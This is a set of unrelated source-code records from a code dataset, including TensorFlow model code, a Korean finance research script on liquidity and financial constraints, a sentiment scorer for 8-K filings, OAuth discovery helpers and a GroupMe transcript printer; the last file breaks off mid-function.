outputs\n#########################\n y_out = tf.concat(1, y_out)\n model['y_out'] = y_out\n segm_gt = tf.concat(1, [tf.expand_dims(ss, 1) for ss in segm_gt])\n model['segm_gt'] = segm_gt\n\n#########################\n# Loss function\n#########################\n y_gt_shape = tf.shape(y_gt)\n num_ex_f = tf.to_float(y_gt_shape[0])\n max_num_obj = tf.to_float(y_gt_shape[1])\n\n##############################\n# Segmentation 
loss\n##############################\n # Matching\n identity_match = base.get_identity_match(num_ex, timespan, s_gt)\n iou_soft = base.f_iou(y_out, segm_gt, pairwise=False)\n iou_soft *= s_gt\n # iou_soft = tf.Print(iou_soft, [iou_soft, tf.shape(iou_soft), tf.reduce_max(segm_gt)])\n match = identity_match\n model['match'] = match\n match_sum = tf.reduce_sum(match, reduction_indices=[2])\n match_count = tf.reduce_sum(match_sum, reduction_indices=[1])\n match_count = tf.maximum(1.0, match_count)\n\n # IOU (soft)\n iou_soft_mask = iou_soft\n iou_soft = tf.reduce_sum(iou_soft_mask, [1])\n iou_soft = tf.reduce_sum(iou_soft / match_count) / num_ex_f\n model['iou_soft'] = iou_soft\n\n if segm_loss_fn == 'iou':\n segm_loss = -iou_soft\n else:\n raise Exception('Unknown segm_loss_fn: {}'.format(segm_loss_fn))\n model['segm_loss'] = segm_loss\n segm_loss_coeff = tf.constant(1.0)\n tf.add_to_collection('losses', segm_loss_coeff * segm_loss)\n\n####################\n# Total loss\n####################\n total_loss = tf.add_n(tf.get_collection('losses'), name='total_loss')\n model['loss'] = total_loss\n\n####################\n# Optimizer\n####################\n learn_rate = tf.train.exponential_decay(\n base_learn_rate, global_step, steps_per_learn_rate_decay,\n learn_rate_decay, staircase=True)\n model['learn_rate'] = learn_rate\n eps = 1e-7\n\n train_step = GradientClipOptimizer(\n tf.train.AdamOptimizer(learn_rate, epsilon=eps),\n clip=clip_gradient).minimize(total_loss, global_step=global_step)\n model['train_step'] = train_step\n\n return model\n","sub_path":"src/ris_fg_model.py","file_name":"ris_fg_model.py","file_ext":"py","file_size_in_byte":8555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"637115464","text":"#!/usr/bin/env python3\n\"\"\"\nFile Name : Problem076.py\nDate started : 2012-10-06\nDate solved : 2013-01-06\nRun Time : 864.13864 seconds\n\nIt is possible to write five as a sum in exactly six different ways:\n 4 + 1\n 3 + 2\n 3 + 1 + 1\n 2 + 2 + 1\n 2 + 1 + 1 + 1\n 1 + 1 + 1 + 1 + 1\n\nHow many different ways can one hundred (100) be written as a sum of at least\ntwo positive integers?\n\n\"\"\"\n\nimport project_euler\nimport project_euler.number_theory\n\nPROBLEM_NUMBER = 76\nSOLVED = 1\n\n\ndef problem076(input_=None):\n return project_euler.number_theory.partition(100) - 1\n\n\ndef run():\n print(project_euler.print_timing(problem076))\n\n\nif __name__ == \"__main__\":\n run()\n\n","sub_path":"problems/Problem076.py","file_name":"Problem076.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"408747408","text":"# ==============================================================================\r\n# Liquidity vs Financial Constraint\r\n# ==============================================================================\r\n\r\n#%%\r\nfrom itertools import product\r\nfrom sqlplus import *\r\nimport statistics as st\r\nimport numpy as np\r\nimport math\r\nfrom scipy.stats import ttest_1samp\r\nfrom contextlib import redirect_stdout\r\n\r\n\r\ndef addmonth(date, n):\r\n return dmath(date, f'{n} months', '%Y-%m')\r\n\r\n\r\ndef stars(pval):\r\n if pval <= 0.01:\r\n return \"***\"\r\n elif pval <= 0.05:\r\n return \"**\"\r\n elif pval <= 0.10:\r\n return \"*\"\r\n return \"\"\r\n\r\n\r\ndef diff(high, low):\r\n return [a - b for a, b in zip(high, low)]\r\n\r\n\r\ndef ttest(seq, n=3):\r\n tval, pval = ttest_1samp(seq, 0.0)\r\n return 
f'{round(st.mean(seq), n)}{stars(pval)}', round(tval, n)\r\n\r\n\r\nsetdir('data')\r\nprint('ready...')\r\n\r\n\r\n# ==============================================================================\r\n# File Loading\r\n# ==============================================================================\r\n\r\n#%%\r\nwith connect('db.db') as c:\r\n # 파일을 로딩할때 살짝 바꿔서 로딩할수 있음\r\n def yyyymm(r):\r\n \"1981-01-21 => 1981-01 column 하나 추가\"\r\n r.yyyymm = dconv(r.date, '%Y-%m-%d', '%Y-%m')\r\n return r\r\n\r\n def build_yyyymm(r):\r\n \"year 하고 month 붙이기 예를들면 1999, 3 => 1999-03\"\r\n r.yyyymm = str(r.year) + '-' + str(r.month).zfill(2)\r\n return r\r\n\r\n c.load('daily.csv', fn=yyyymm)\r\n c.load('comp_kor.csv', fn=build_yyyymm)\r\n c.load('prc.csv', fn=yyyymm)\r\n c.load('shrout.csv', fn=yyyymm)\r\n c.load('inflation.csv')\r\n c.load('ret.csv', fn=yyyymm)\r\n c.load('mkt500.csv', fn=yyyymm)\r\n c.load('exchcd.csv', fn=yyyymm)\r\n\r\n\r\n# ==============================================================================\r\n# Liquidity measures: Amihud, Zerofreq, Stoll(1989)\r\n# ==============================================================================\r\n# 이 작업은 좀 오래걸리니까 컴퓨터가 4개 이상의 코어를 갖고 있다면\r\n# multi process 를 활용하는 것을 고려해 볼만함 (single core 로 3시간 걸린거 같은데)\r\n#%%\r\ndef stoll_cov(prices):\r\n dprices = []\r\n for p0, p1 in zip(prices, prices[1:]):\r\n if isnum(p0, p1):\r\n dprices.append(p1 - p0)\r\n # np.cov 는 covariance matrix 를 계산\r\n return np.cov([dprices[1:], dprices[:-1]])[0, 1] if len(dprices) > 2 else ''\r\n\r\n\r\nwith connect('db.db') as c:\r\n nmonths = [1, 3, 6, 12]\r\n # nmonths = [12]\r\n # ins 를 쓰면 코드는 이쁜데 너무 느려서 insert 를 써야함\r\n def gen():\r\n for rs in c.fetch(\"daily\", group=\"id\"):\r\n print(rs[0].id)\r\n for nmonth in nmonths:\r\n for rs1 in rs.overlap(nmonth, 1, 'yyyymm'):\r\n if addmonth(rs1[0].yyyymm, nmonth - 1) == rs1[-1].yyyymm:\r\n r = Row()\r\n r.yyyymm = rs1[-1].yyyymm\r\n r.id = rs1[-1].id\r\n xs = []\r\n for r0 in rs1.isnum('ret, tvol'):\r\n if r0.tvol > 0:\r\n xs.append(abs(r0.ret) * 10_000_000 / r0.tvol)\r\n r.amihud = st.mean(xs) if xs else ''\r\n r.zerofreq = len(rs1.where(lambda r: isnum(r.ret) and r.ret == 0))\r\n r.stoll_cov = stoll_cov(rs1['prc'])\r\n r.nmonth = nmonth\r\n # missing 이 아닌 것들의 개수\r\n r.n = len(rs1.isnum('ret'))\r\n yield r\r\n c.insert(gen(), 'liqproxies')\r\n\r\n\r\n# ==============================================================================\r\n# Financial Contraint measures\r\n# ==============================================================================\r\n\r\n#%%\r\n# 모든 fiscal month 가 12 월이라고 간주하고 진행하면, (12월이 아닌 경우는 9% 정도)\r\n# (나중에 바꿔볼지도 모르지만, kz index 계산과정에서 12 월 size 랑 매칭하는 걸 고려할때, 생각해 볼만함)\r\n\r\n\r\n# 12 월의 size 가 필요하니까\r\n# TODO: 이상하게 prc 파일이 shrout 보다 훨씬 크다. 
둘다 코스닥 포함이던데...체크\r\nwith connect('db.db') as c:\r\n c.join(\r\n ['prc', '*', 'yyyymm, id'],\r\n ['shrout', 'shrout', 'yyyymm, id'],\r\n name='temp'\r\n )\r\n\r\n c.drop('size')\r\n for r in c.fetch('temp', where='isnum(prc, shrout)'):\r\n if r.yyyymm[5:] == '12':\r\n # 금액인 경우 단위가 다 천원이더라구\r\n r.size = (r.prc * r.shrout) / 1000\r\n r.year = r.yyyymm[0:4]\r\n c.ins(r, 'size')\r\n\r\n#%%\r\n\r\n# 전기 total asset 이랑 size 가 필요하니까\r\nwith connect('db.db') as c:\r\n c.create(\"select ta, ppe, id, year + 1 as year1 from comp_kor\", \"temp\")\r\n\r\n c.join(\r\n [\"comp_kor\", \"*\", \"id, year\"],\r\n # 혹시 몰라서 ppe 도\r\n [\"temp\", \"ta as ta1, ppe as ppe1\", \"id, year1\"],\r\n ['size', 'size', \"id, year\"],\r\n name='comp'\r\n )\r\n # inflation 을 붙이고\r\n c.join(\r\n ['comp', '*', 'year'],\r\n ['inflation', 'inflation', 'year']\r\n )\r\n\r\n\r\n#%%\r\n\r\nwith connect('db.db') as c:\r\n c.drop('constraints')\r\n for r in c.fetch('comp', where=\"\"\"\r\n isnum(oi, noi, dep, noc, div, ta1, ta, te, prefstock, size, tl, cash, csec, estdate)\r\n and ta1 > 0 and te > 0\r\n \"\"\"):\r\n # cash flow\r\n cf = (r.oi + r.noi + r.dep - r.noc - r.div) / r.ta1\r\n # cash holdings\r\n ch = (r.cash + r.csec) / r.ta1\r\n tobinq = (r.ta - (r.te - r.prefstock) + r.size) / r.te\r\n r.kzindex = -1.002 * cf + 0.283 * tobinq + 3.139 * (r.tl / r.ta1) \\\r\n - 39.368 * (r.div / r.ta1) - 1.315 * ch\r\n r.age = r.year - int(str(r.estdate)[0:4])\r\n # TODO: Whited and Wu index 는 왜 안섰는지\r\n # TODO: sa index 계산을 원화로 하면 뭔가 많이 이상해지는데\r\n # ta 는 단위 1000원 이므로 dollar 랑 비슷하긴 한데\r\n # inflation 은 2015 년을 100 으로 한 통계청 소비자 물가 지수\r\n # 논문에서는 age 랑 size winsorizing 도 있음!!\r\n logta = math.log(r.ta / (r.inflation / 100))\r\n\r\n r.saindex = -0.737 * logta + 0.043 * logta ** 2 - 0.040 * r.age\r\n r.ch = ch\r\n r.cf = cf\r\n r.tobinq = tobinq\r\n r.logta = logta\r\n c.ins(r, 'constraints')\r\n\r\n\r\n#%%\r\n# Almeida (alpha1)\r\nwith connect('db.db') as c:\r\n c.create('select id, year + 1 as year, ch as ch1 from constraints', 'temp')\r\n c.join(\r\n ['constraints', '*', 'id, year'],\r\n ['temp', 'ch1', 'id, year'],\r\n name='temp',\r\n pkeys='id, year'\r\n )\r\n\r\n c.drop('almeida')\r\n # TODO: 6 년은 임의의 값\r\n for rs in c.fetch('temp', order='year', group='id', where=\"\"\"\r\n isnum(ch, ch1, cf, tobinq, logta)\r\n \"\"\"):\r\n for rs1 in rs.overlap(6):\r\n if rs1[0].year + 5 == rs1[-1].year:\r\n for r in rs1:\r\n r.dch = r.ch - r.ch1\r\n result = rs1.ols('dch ~ cf + tobinq + logta')\r\n r0 = Row()\r\n r0.year = rs1[-1].year\r\n r0.id = rs1[-1].id\r\n r0.almeida = result.params.cf\r\n c.ins(r0, 'almeida')\r\n\r\n c.join(\r\n ['constraints', '*', 'id, year'],\r\n ['almeida', 'almeida', 'id, year'],\r\n name='constraints1'\r\n )\r\n\r\n\r\n\r\n\r\n# ==============================================================================\r\n# DATASET\r\n# ==============================================================================\r\n#%%\r\n# liquidity measure 랑 constraint 랑 합해보자\r\n# 근데 lagged(1 month) size 가 필요해 나중에 weighted return 구해야 하거든\r\nwith connect('db.db') as c:\r\n # 아 그냥 'db' 라고 할걸 괜히 'db.db' 라고 해서 귀찮네\r\n c.join(\r\n ['prc', '*', 'id, yyyymm'],\r\n ['shrout', 'shrout', 'id, yyyymm'],\r\n name='temp'\r\n )\r\n c.register(addmonth)\r\n c.create('select *, (prc * shrout) / 1000 as size1, addmonth(yyyymm, 1) as yyyymm1 from temp', 'size1')\r\n\r\n\r\n#%%\r\n\r\nwith connect('db.db') as c:\r\n def gen(tbl):\r\n for r in c.fetch(tbl):\r\n if r.nmonth == 12 and r.yyyymm[5:] == '12':\r\n r.year = r.yyyymm[:4]\r\n r.month = r.yyyymm[5:]\r\n 
yield r\r\n c.insert(gen('liqproxies'), 'temp1')\r\n\r\n def gen1(tbl):\r\n for r in c.fetch(tbl):\r\n if r.yyyymm[5:] == '12':\r\n r.year = r.yyyymm[:4]\r\n r.month = r.yyyymm[5:]\r\n yield r\r\n c.insert(gen1('mkt500'), 'temp2')\r\n c.insert(gen1('exchcd'), 'temp3')\r\n c.join(\r\n ['temp1', '*', 'id, year'],\r\n ['temp2', 'mkt500', 'id, year'],\r\n ['temp3', 'exchcd', 'id, year']\r\n )\r\n\r\n c.join(\r\n ['temp1', '*', 'id, year'],\r\n ['constraints1', 'kzindex, logta, age, payout, saindex, almeida', 'id, year']\r\n )\r\n\r\n # TODO: 맞는지 확인, \"2012-04\" - \"2013-03\" 까지를 2011 년의 constraint 랑 맞춰줘야 하니까,\r\n def matching_year(yyyymm):\r\n year = int(yyyymm[0:4])\r\n if yyyymm[5:] in ['01', '02', '03']:\r\n return year - 2\r\n return year - 1\r\n\r\n # 위의 함수를 등록해주면, sql 에서 쓸수 있게 됨\r\n c.register(matching_year)\r\n c.join(\r\n ['ret', '*', 'id, yyyymm'],\r\n ['size1', 'prc, shrout, size1', 'id, yyyymm1'],\r\n name='temp2'\r\n )\r\n c.create('select *, matching_year(yyyymm) as myear from temp2')\r\n\r\n c.join(\r\n ['temp2', '*', 'id, myear'],\r\n ['temp1', \"\"\"amihud, zerofreq, stoll_cov, nmonth, exchcd, mkt500,\r\n kzindex, logta, age, payout, saindex, almeida\"\"\", 'id, year'],\r\n name='dataset'\r\n )\r\n c.create(\"\"\"select * from dataset where isnum(ret, prc) and prc >= 1000\r\n and (exchcd=\"유가증권시장\" or exchcd=\"코스닥\")\r\n \"\"\")\r\n\r\n\r\n\r\n\r\n# ==============================================================================\r\n# 2 WAY sorting\r\n# ==============================================================================\r\n#%%\r\n# liquidity 계산 기간을 1, 3, 6, 12 로 했는데 생각해 보니까 FC 랑 맞추려면 일단 12 개월이\r\n# 첫번째 후보가 되어야 할것 같음\r\nwith connect('db.db') as c:\r\n fcs = ['kzindex', 'logta', 'age', 'payout', 'saindex', 'almeida']\r\n liqs = ['amihud', 'zerofreq', 'stoll_cov']\r\n\r\n def gen():\r\n for fc, liq in product(fcs, liqs):\r\n print(fc, liq)\r\n for rs in c.fetch('dataset', order='yyyymm', group='myear', where=f\"\"\"\r\n isnum({fc}, {liq}, ret) and (exchcd=\"유가증권시장\")\r\n \"\"\"):\r\n # fc, liq column 추가\r\n rs.set('fc', fc)\r\n rs.set('liq', liq)\r\n\r\n # 1 년치씩 뽑아낸 후에, 첫번째 달의 값을 기준으로 포트폴리오를 짜고\r\n rs0 = rs.group('yyyymm')[0]\r\n\r\n # dependent sort\r\n rs.set('pn_fc', '')\r\n rs.set('pn_liq', '')\r\n # fc 로 먼저 sort\r\n for i, c1 in enumerate(rs0.order(fc).chunk(5), 1):\r\n c1.set('pn_fc', i)\r\n for j, c2 in enumerate(c1.order(liq).chunk(5), 1):\r\n c2.set('pn_liq', j)\r\n # 이제 firm 별로 그루핑을 하고 첫번째 달의 값을 나머지 달에도 할당해 주면\r\n for rs1 in rs.group('id'):\r\n rs1.set('pn_fc', rs1[0].pn_fc)\r\n rs1.set('pn_liq', rs1[0].pn_liq)\r\n yield from rs\r\n c.insert(gen(), 'twoway')\r\n\r\n\r\n#%%\r\n# 각 포트폴리오별 ew, vw 평균을 구해봅시다\r\n# (도대체 이게 왜 오래걸리는지 모르겠다만, 꽤 오래걸림)\r\n\r\nwith connect('db.db') as c:\r\n def gen():\r\n for rs in c.fetch('twoway', group=\"fc, liq, yyyymm, pn_fc, pn_liq\",\r\n where=\"isnum(pn_fc, pn_liq, size1)\"):\r\n r = rs[0]\r\n r.ewret = rs.avg('ret')\r\n r.vwret = rs.avg('ret', 'size1')\r\n r.n = len(rs)\r\n yield r\r\n\r\n for rs in c.fetch('twoway', group=\"fc, liq, yyyymm, pn_fc \",\r\n where=\"isnum(pn_fc, pn_liq, size1)\"):\r\n r = rs[0]\r\n r.pn_liq = 0\r\n r.ewret = rs.avg('ret')\r\n r.vwret = rs.avg('ret', 'size1')\r\n r.n = len(rs)\r\n yield r\r\n\r\n for rs in c.fetch('twoway', group=\"fc, liq, yyyymm, pn_liq \",\r\n where=\"isnum(pn_fc, pn_liq, size1)\"):\r\n r = rs[0]\r\n r.pn_fc = 0\r\n r.ewret = rs.avg('ret')\r\n r.vwret = rs.avg('ret', 'size1')\r\n r.n = len(rs)\r\n yield r\r\n\r\n for rs in c.fetch('twoway', group=\"fc, liq, yyyymm\",\r\n 
where=\"isnum(pn_fc, pn_liq, size1)\"):\r\n r = rs[0]\r\n r.pn_fc = 0\r\n r.pn_liq = 0\r\n r.ewret = rs.avg('ret')\r\n r.vwret = rs.avg('ret', 'size1')\r\n r.n = len(rs)\r\n yield r\r\n\r\n c.insert(gen(), 'result01')\r\n\r\n\r\n# ==============================================================================\r\n# Table01.csv\r\n# ==============================================================================\r\n#%%\r\ndef getfn(rs, i, j):\r\n if i == 0 and j == 0:\r\n return rs\r\n elif i == 0:\r\n return rs.where(lambda r: r.pn_liq == j)\r\n elif j == 0:\r\n return rs.where(lambda r: r.pn_fc == i)\r\n else:\r\n return rs.where(lambda r: r.pn_fc == i and r.pn_liq == j)\r\n\r\n\r\nwith connect('db.db') as c:\r\n def avgfn(rs, col):\r\n print()\r\n print(rs[0].fc, rs[0].liq, col)\r\n print(',0,1,2,3,4,5,diff')\r\n for i in range(6):\r\n print(i, end=',')\r\n for j in range(6):\r\n print(getfn(rs, i, j).avg(col, ndigits=2), end=',')\r\n high = getfn(rs, i, 5)[col]\r\n low = getfn(rs, i, 1)[col]\r\n m, tval = ttest(diff(high, low))\r\n print(f'{m}[{tval}]')\r\n print(end=',')\r\n for j in range(6):\r\n high = getfn(rs, 5, j)[col]\r\n low = getfn(rs, 1, j)[col]\r\n m, tval = ttest(diff(high, low))\r\n print(f'{m}[{tval}]', end=',')\r\n h1 = getfn(rs, 1, 5)[col]\r\n l1 = getfn(rs, 1, 1)[col]\r\n h2 = getfn(rs, 5, 5)[col]\r\n l2 = getfn(rs, 5, 1)[col]\r\n # diff of diff\r\n d = diff(diff(h2, l2), diff(h1, l1))\r\n m, tval = ttest(d)\r\n print(f'{m}[{tval}]')\r\n print()\r\n\r\n with open('table01.csv', 'w') as f, redirect_stdout(f):\r\n for rs in c.fetch('result01', group='fc, liq', where=\"\"\"\r\n yyyymm >= '2001-04' and yyyymm <= '2017-03'\r\n \"\"\"):\r\n avgfn(rs, 'ewret')\r\n avgfn(rs, 'vwret')\r\n\r\n\r\n\r\n\r\n#%%\r\n\r\n# ==============================================================================\r\n# ==============================================================================\r\n\r\nwith connect('db.db') as c:\r\n # print(c.df('dataset', cols='ret, size1, amihud, stoll_cov, zerofreq, kzindex, logta, age, payout, saindex, almeida').describe())\r\n print(c.df('dataset', where='isnum(ret)', cols='ret').describe([0.01, 0.05, 0.1, 0.25, 0.5, 0.75, 0.9, 0.95, 0.99]))\r\n # print(c.df('dataset', where='isnum(ret) and ret > 1000', cols='ret').describe([0.01, 0.05, 0.1, 0.25, 0.5, 0.75, 0.9, 0.95, 0.99]))\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"573871361","text":"import pandas as pd\nimport numpy as np\nimport os\nimport re\n\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom nltk import tokenize\n\n\ndef cal_tone():\n\n # re expressions to parse the text\n prog_line = re.compile('\\n')\n prog_nbsp = re.compile(' ')\n prog_tag = re.compile('<.*?>')\n\n res = []\n sid = SentimentIntensityAnalyzer()\n for root, _, files in os.walk('data/'):\n for file in files:\n CIK, date = file.split('|')[0], file.split('|')[1][:10]\n entry = {'CIK': int(CIK), 'date': date}\n with open(root + '/' + file, 'r') as f:\n text = f.read()\n\n # informational part of 8-K\n text = text[text.find(''): text.find('')]\n text = prog_line.sub(' ', text)\n text = prog_nbsp.sub(' ', text)\n text = prog_tag.sub(' ', text)\n\n # tokenize and calculate compound score\n sentences = tokenize.sent_tokenize(text)\n scores = [sid.polarity_scores(stn)['compound'] for stn in sentences[2:-4]]\n try:\n entry['tone'] = sum(scores) / len(scores)\n except:\n 
entry['tone'] = np.nan\n res.append(entry)\n\n res_df = pd.DataFrame(res)\n res_df.to_csv('out/adv_sentiment.csv')\n\n\nif __name__ == \"__main__\":\n cal_tone()","sub_path":"Python/Chava Final/adv_sentiment.py","file_name":"adv_sentiment.py","file_ext":"py","file_size_in_byte":1407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"37292868","text":"from __future__ import absolute_import\n\nimport logging as _logging\n\nfrom flytekit.clis.auth.auth import AuthorizationClient as _AuthorizationClient\nfrom flytekit.clis.auth.discovery import DiscoveryClient as _DiscoveryClient\n\nfrom flytekit.configuration.creds import (\n REDIRECT_URI as _REDIRECT_URI,\n CLIENT_ID as _CLIENT_ID,\n)\nfrom flytekit.configuration.platform import URL as _URL, INSECURE as _INSECURE, HTTP_URL as _HTTP_URL\n\ntry: # Python 3\n import urllib.parse as _urlparse\nexcept ImportError: # Python 2\n import urlparse as _urlparse\n\n# Default, well known-URI string used for fetching JSON metadata. See https://tools.ietf.org/html/rfc8414#section-3.\ndiscovery_endpoint_path = \"./.well-known/oauth-authorization-server\"\n\n\ndef _get_discovery_endpoint(http_config_val, platform_url_val, insecure_val):\n\n if http_config_val:\n scheme, netloc, path, _, _, _ = _urlparse.urlparse(http_config_val)\n if not scheme:\n scheme = 'http' if insecure_val else 'https'\n else: # Use the main _URL config object effectively\n scheme = 'http' if insecure_val else 'https'\n netloc = platform_url_val\n path = ''\n\n computed_endpoint = _urlparse.urlunparse((scheme, netloc, path, None, None, None))\n # The urljoin function needs a trailing slash in order to append things correctly. Also, having an extra slash\n # at the end is okay, it just gets stripped out.\n computed_endpoint = _urlparse.urljoin(computed_endpoint + '/', discovery_endpoint_path)\n _logging.info('Using {} as discovery endpoint'.format(computed_endpoint))\n return computed_endpoint\n\n\n# Lazy initialized authorization client singleton\n_authorization_client = None\n\n\ndef get_client():\n global _authorization_client\n if _authorization_client is not None and not _authorization_client.expired:\n return _authorization_client\n authorization_endpoints = get_authorization_endpoints()\n\n _authorization_client =\\\n _AuthorizationClient(redirect_uri=_REDIRECT_URI.get(), client_id=_CLIENT_ID.get(),\n auth_endpoint=authorization_endpoints.auth_endpoint,\n token_endpoint=authorization_endpoints.token_endpoint)\n return _authorization_client\n\n\ndef get_authorization_endpoints():\n discovery_endpoint = _get_discovery_endpoint(_HTTP_URL.get(), _URL.get(), _INSECURE.get())\n discovery_client = _DiscoveryClient(discovery_url=discovery_endpoint)\n return discovery_client.get_authorization_endpoints()\n","sub_path":"flytekit/clis/auth/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":2517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"185806496","text":"import mongoengine\nfrom mongoengine import signals\n\nfrom daimaduan.models import BaseDocument\n\n\nclass Like(BaseDocument):\n user = mongoengine.ReferenceField('User')\n likeable = mongoengine.GenericReferenceField('Paste')\n\n @classmethod\n def post_save(cls, sender, document, **kwargs):\n if kwargs.get('created'):\n field = document.likeable._cls.lower()\n document.user.increase_counter('%s_likes' % field)\n document.likeable.increase_counter('likes')\n\n @classmethod\n def 
post_delete(cls, sender, document, **kwargs):\n field = document.likeable._cls.lower()\n document.user.increase_counter('%s_likes' % field, -1)\n document.likeable.increase_counter('likes', -1)\n\nsignals.post_save.connect(Like.post_save, sender=Like)\nsignals.post_delete.connect(Like.post_delete, sender=Like)\n","sub_path":"daimaduan/models/like.py","file_name":"like.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"333592485","text":"import sys\nreload(sys)\nsys.setdefaultencoding(\"utf-8\")\n\nimport json\nimport datetime\n\n\ndef printTranscript(messages):\n \"\"\"Prints a readable \"transcript\" from the given list of messages.\n\n Assumes the input list is sorted.\"\"\"\n\n for message in messages:\n name = message[u'name']\n\n time = datetime.datetime.fromtimestamp(message[u'created_at']).strftime('%Y-%m-%d %H:%M')\n\n # text is None for a photo message\n if message[u'text'] is not None:\n text = message[u'text']\n else:\n text = \"(no text)\"\n\n if message[u'system'] is True:\n system_padded = '(SYS) '\n else:\n system_padded = ''\n\n if len(message[u'favorited_by']) is not 0:\n favorites_padded = ' (' + str(len(message[u'favorited_by'])) + 'x <3)'\n else:\n favorites_padded = ''\n\n if message[u'picture_url'] is not None:\n pic = ' ; photo URL ' + message[u'picture_url']\n else:\n pic = ''\n\n print(system_padded + name + ' (' + time + ')' + favorites_padded + ': ' + text + pic)\n\n\ndef main():\n \"\"\"Usage: simple-transcript.py filename.json\n\nAssumes filename.json is a JSON GroupMe transcript in chronological order.\n\nTimes displayed in local timezone.\n \"\"\"\n\n if len(sys.argv) < 2:\n print(main.__doc__)\n sys.exit(1)\n\n transcriptFile = open(sys.argv[1])\n transcript = json.load(transcriptFile)\n transcriptFile.close()\n\n printTranscript(transcript)\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)\n","sub_path":"simple-transcript.py","file_name":"simple-transcript.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"144914243","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2020/5/28 11:46\r\n# @Author : TheTao\r\n# @Site : \r\n# @File : PGN_model.py\r\n# @Software: PyCharm\r\nimport tensorflow as tf\r\nfrom PGN_remodel.model_layers import Encoder, Decoder, BahdanauAttention, Pointer\r\nfrom PGN_remodel.data_utils.wv_loader import load_embedding_matrix\r\n\r\n\r\nclass PGN(tf.keras.Model):\r\n # 搭建网络架构\r\n def __init__(self, params):\r\n super(PGN, self).__init__()\r\n self.embedding_matrix = load_embedding_matrix()\r\n self.params = params\r\n self.encoder = Encoder(params[\"vocab_size\"],\r\n params[\"embed_size\"],\r\n self.embedding_matrix,\r\n params[\"enc_units\"],\r\n params[\"batch_size\"])\r\n self.attention = BahdanauAttention(units=params[\"attn_units\"])\r\n self.decoder = Decoder(params[\"vocab_size\"],\r\n params[\"embed_size\"],\r\n self.embedding_matrix,\r\n params[\"dec_units\"],\r\n params[\"batch_size\"],\r\n self.attention)\r\n self.pointer = Pointer()\r\n\r\n def call_encoder(self, enc_inp):\r\n enc_output, enc_hidden = self.encoder(enc_inp)\r\n return enc_output, enc_hidden\r\n\r\n def call_decoder_one_step(self, enc_extended_inp, batch_oov_len, dec_input, dec_hidden, enc_output,\r\n enc_pad_mask, prev_coverage, use_coverage=True):\r\n # 开始decoder\r\n context_vector, dec_hidden, dec_x, pred, attn, coverage = 
self.decoder(dec_input, dec_hidden, enc_output,\r\n enc_pad_mask, prev_coverage,\r\n use_coverage)\r\n if self.params[\"pointer_gen\"]:\r\n # 计算p_gen\r\n p_gen = self.pointer(context_vector, dec_hidden, dec_x)\r\n # 保证pred attn p_gen的参数为3D的\r\n final_dist = _calc_final_dist(enc_extended_inp,\r\n tf.expand_dims(pred, 1),\r\n tf.expand_dims(attn, 1),\r\n tf.expand_dims(p_gen, 1),\r\n batch_oov_len,\r\n self.params[\"vocab_size\"],\r\n self.params['batch_size'])\r\n return tf.stack(final_dist, 1), dec_hidden, context_vector, attn, p_gen, coverage\r\n\r\n def call(self, enc_inp, dec_inp, enc_extended_inp, batch_oov_len, enc_pad_mask, use_coverage=True):\r\n \"\"\"\r\n :param enc_inp:\r\n :param dec_inp: tf.expand_dims(dec_inp[:, t], 1)\r\n :param enc_extended_inp:\r\n :param batch_oov_len:\r\n \"\"\"\r\n predictions = []\r\n attentions = []\r\n p_gens = []\r\n coverages = []\r\n # 计算encoder的输出\r\n enc_output, enc_hidden = self.encoder(enc_inp)\r\n dec_hidden = enc_hidden\r\n # 初始化coverage\r\n # (batch_size, enc_len, 1)\r\n prev_coverage = tf.zeros((enc_output.shape[0], enc_output.shape[1], 1))\r\n # teacher forcing\r\n for t in tf.range(dec_inp.shape[1]):\r\n context_vector, dec_hidden, dec_x, pred, attn, prev_coverage \\\r\n = self.decoder(dec_inp[:, t], # (batch_size, )\r\n dec_hidden, # (batch_size, dec_units)\r\n enc_output, # (batch_size, enc_len, enc_units)\r\n enc_pad_mask, # (batch_size, enc_len)\r\n prev_coverage,\r\n use_coverage)\r\n # 计算P_gen\r\n p_gen = self.pointer(context_vector, dec_hidden, dec_x)\r\n # 每轮迭代后把相应数据写入TensorArray\r\n predictions.append(pred)\r\n attentions.append(attn)\r\n p_gens.append(p_gen)\r\n coverages.append(prev_coverage)\r\n\r\n predictions = tf.stack(predictions, axis=1)\r\n attentions = tf.stack(attentions, axis=1)\r\n p_gens = tf.stack(p_gens, axis=1)\r\n coverages = tf.stack(coverages, axis=1)\r\n coverages = tf.squeeze(coverages, -1)\r\n # 计算final_dist\r\n # 注tf.transpose()的作用是调整坐标轴顺序\r\n # predictions.stack() 的 shape == (dec_len, batch_size, vocab_size)\r\n # 执行了tf.transpose 后 shape == (batch_size, dec_len, vocab_size)\r\n final_dist = _calc_final_dist(enc_extended_inp,\r\n predictions,\r\n attentions,\r\n p_gens,\r\n batch_oov_len,\r\n self.params[\"vocab_size\"],\r\n self.params[\"batch_size\"])\r\n\r\n return final_dist, attentions, coverages\r\n\r\n\r\n# 这里也是改动重点\r\ndef _calc_final_dist(_enc_batch_extend_vocab, vocab_dists, attn_dists, p_gens, batch_oov_len, vocab_size, batch_size):\r\n # 确定的修改代码\r\n # 确定的修改代码\r\n # 先计算公式的左半部分\r\n # _vocab_dists_pgn (batch_size, dec_len, vocab_size)\r\n _vocab_dists_pgn = vocab_dists * p_gens\r\n # 根据oov表的长度补齐原词表\r\n # _extra_zeros (batch_size, dec_len, batch_oov_len)\r\n\r\n _extra_zeros = tf.zeros((batch_size, p_gens.shape[1], batch_oov_len))\r\n # 